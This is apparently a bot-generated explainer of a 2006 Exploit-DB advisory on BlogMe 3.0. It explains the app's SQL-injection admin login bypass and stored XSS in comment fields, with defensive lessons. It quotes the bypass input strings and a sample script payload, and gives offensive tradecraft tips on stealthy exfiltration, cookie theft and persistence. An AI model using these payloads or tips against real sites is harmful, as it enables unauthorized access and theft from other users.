By exploitdb papers bot•November 14, 2006•
papers
BlogMe 3.0 Authentication Bypass and XSS Explained
BlogMe 3.0 Authentication Bypass and XSS Explained
What this paper is
This paper details two vulnerabilities found in BlogMe version 3.0, a web application.
- Authentication Bypass: An attacker can gain administrative access without knowing valid credentials.
- Cross-Site Scripting (XSS): An attacker can inject malicious scripts into the web application, which can then be executed by other users.
The paper was published on November 14, 2006, by Security Access Point (SAP).
Simple technical breakdown
BlogMe 3.0, being an ASP web application, likely processed user input on the server-side.
- Authentication Bypass: The vulnerability exploits how the application checks login credentials. Instead of strictly verifying a username and password, it appears to have been susceptible to SQL injection. By providing specially crafted input, an attacker could manipulate the database query to always return a "true" result, effectively logging them in as an administrator.
- XSS: The application did not properly sanitize user input when displaying comments or other user-provided data. This allowed attackers to embed HTML and JavaScript code within their submissions. When another user viewed these submissions, their browser would execute the injected script, potentially leading to session hijacking, defacement, or redirection.
Complete code and payload walkthrough
The provided paper does not contain executable code or shellcode. It describes the vulnerabilities and provides the specific input strings used to exploit them.
Here's a breakdown of the exploit strings and their purpose:
Authentication Bypass Exploit Strings:
user : ' or '1' = '1passwd: 1'='1' ro '
Mapping:
' or '1' = '1(Username field): This string is a classic SQL injection payload. In a typical SQL query likeSELECT * FROM users WHERE username = 'USER_INPUT' AND password = 'PASSWORD_INPUT', this input would alter the query. The'closes the expected string literal for the username.OR '1' = '1'is always true. So, theWHEREclause effectively becomesWHERE username = '' OR '1' = '1' AND password = '...'. If the application logic doesn't properly quote or escape the input, theOR '1' = '1'condition could bypass the username check entirely, or make the entire condition true if the password check also fails or is bypassed.1'='1' ro '(Password field): This string is also designed for SQL injection. The1'='1'part is a condition that is always true. Therois likely a typo or an artifact from a more complex injection attempt, possibly intended to beOR. The trailing'would close the expected string literal for the password. Combined with the username bypass, this input further ensures the authentication check evaluates to true.
XSS Exploit Strings:
The paper indicates that the following fields are vulnerable to XSS when submitting comments via/comments.asp?blog=85:NameURLComments
Mapping:
- Vulnerable Fields (
Name,URL,Comments): The paper states that input provided in these fields is not properly sanitized before being displayed back to users. This means an attacker can submit HTML or JavaScript code. For example, in theCommentsfield, an attacker could submit:<script>alert('XSSed!');</script>
Note: The paper does not provide the actual ASP code for BlogMe 3.0, nor does it provide specific shellcode or payloads beyond the exploit strings themselves. The explanation above is based on common SQL injection and XSS techniques prevalent in 2006 and the provided input patterns.
Practical details for offensive operations teams
Required Access Level:
- Authentication Bypass: Network access to the BlogMe 3.0 web application. No prior authentication is required.
- XSS: Network access to the BlogMe 3.0 web application. The attacker needs to be able to submit comments.
Lab Preconditions:
- A vulnerable instance of BlogMe 3.0 must be deployed and accessible. Given the age of the vulnerability, this would likely require setting up a legacy environment (e.g., Windows Server 2003 with IIS 6.0 and a compatible ASP runtime).
- A web browser capable of making POST requests.
- For XSS, a target user who will view the injected content.
Tooling Assumptions:
- Authentication Bypass:
- A web browser (e.g., Internet Explorer, Firefox) to manually craft POST requests.
- A web proxy like Burp Suite or OWASP ZAP to intercept and modify login requests.
- XSS:
- A web browser.
- A web proxy to intercept and modify comment submission requests.
- Potentially, a tool to automate the submission of XSS payloads across multiple comment fields if the application allows it.
- Authentication Bypass:
Execution Pitfalls:
- Authentication Bypass:
- Input Encoding/Sanitization: Modern web applications or even patched versions of BlogMe 3.0 would likely have input validation and SQL sanitization in place, rendering these specific payloads ineffective.
- Database Specifics: The exact SQL syntax might vary slightly depending on the backend database used by BlogMe 3.0 (e.g., MS SQL Server, MySQL). The provided payload is generic for SQL injection.
- Application Logic: The application might have additional checks beyond the username/password fields that could prevent bypass.
- XSS:
- Output Encoding/Sanitization: The most common defense against XSS is output encoding. If BlogMe 3.0 properly encodes HTML entities (e.g.,
<becomes<), the script will be displayed as text, not executed. - Browser Security Features: Modern browsers have built-in XSS filters that might block some basic payloads.
- Content Security Policy (CSP): If the web server or application implements CSP, it can restrict which scripts are allowed to run, mitigating XSS impact.
- Context of Injection: The effectiveness of XSS depends on where the input is displayed. If it's within an HTML attribute or a JavaScript block, different payloads might be required. The paper implies it's in plain text display.
- Output Encoding/Sanitization: The most common defense against XSS is output encoding. If BlogMe 3.0 properly encodes HTML entities (e.g.,
- Authentication Bypass:
Tradecraft Considerations:
- Reconnaissance: Confirm the exact version of BlogMe being used.
- Payload Crafting: For XSS, test various payloads to bypass filters and achieve desired effects (e.g., cookie theft, redirection).
- Stealth: When performing XSS, consider the impact on other users. Ensure the injected script is as unobtrusive as possible if the goal is stealthy data exfiltration.
- Post-Exploitation: For authentication bypass, once admin access is gained, immediately look for ways to persist access or exfiltrate data.
Where this was used and when
- Context: This vulnerability was relevant to any organization or individual using BlogMe version 3.0 for their blogging platform.
- Timeframe: The paper was published in November 2006. Therefore, this vulnerability was actively exploitable around this period. It's highly unlikely to be effective against any modern, patched, or updated web application.
Defensive lessons for modern teams
- Input Validation and Sanitization: Always validate and sanitize all user-supplied input on both the client-side (for user experience) and, critically, on the server-side before processing or storing it.
- Parameterized Queries/Prepared Statements: For database interactions, use parameterized queries or prepared statements to prevent SQL injection. Never concatenate user input directly into SQL queries.
- Output Encoding: Always encode output appropriately for the context in which it is displayed (e.g., HTML entity encoding for HTML content, JavaScript encoding for JavaScript contexts).
- Least Privilege: Ensure that web application accounts and database accounts operate with the minimum necessary privileges.
- Regular Patching and Updates: Keep all software, including web applications and their underlying frameworks, up to date with the latest security patches.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attacks like SQL injection and XSS.
- Security Audits and Code Reviews: Regularly conduct security audits and code reviews to identify vulnerabilities before they can be exploited.
ASCII visual (if applicable)
This paper describes web application vulnerabilities, not network protocols or complex architectures, making a traditional ASCII diagram for network flow less applicable. However, we can visualize the data flow for the vulnerabilities:
1. Authentication Bypass (SQL Injection):
+-----------------+ +-----------------+ +-----------------+
| Attacker's Input| ---> | Web Application | ---> | Database Server |
| (Malicious SQL) | | (BlogMe 3.0) | | (User Table) |
+-----------------+ +-------+---------+ +--------+--------+
| ^
| (Unsanitized Query) | (Authentication Success)
v |
+-----------------+ +-----------------+
| Login Logic | ---> | Admin Session |
+-----------------+ +-----------------+2. Cross-Site Scripting (XSS):
+-----------------+ +-----------------+ +-----------------+
| Attacker's Input| ---> | Web Application | ---> | Database Server |
| (Malicious JS) | | (BlogMe 3.0) | | (Comments Table)|
+-----------------+ +-------+---------+ +-----------------+
|
| (Unsanitized Output)
v
+-----------------+ +-----------------+
| Victim's Browser| <--- | Web Application |
| (JS Executes) | | (BlogMe 3.0) |
+-----------------+ +-----------------+Source references
- PAPER ID: 2781
- PAPER TITLE: blogme 3.0 - Cross-Site Scripting / Authentication Bypass
- AUTHOR: Security Access Point
- PUBLISHED: 2006-11-14
- KEYWORDS: ASP,webapps
- PAPER URL: https://www.exploit-db.com/papers/2781
- RAW URL: https://www.exploit-db.com/raw/2781
Original Exploit-DB Content (Verbatim)
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]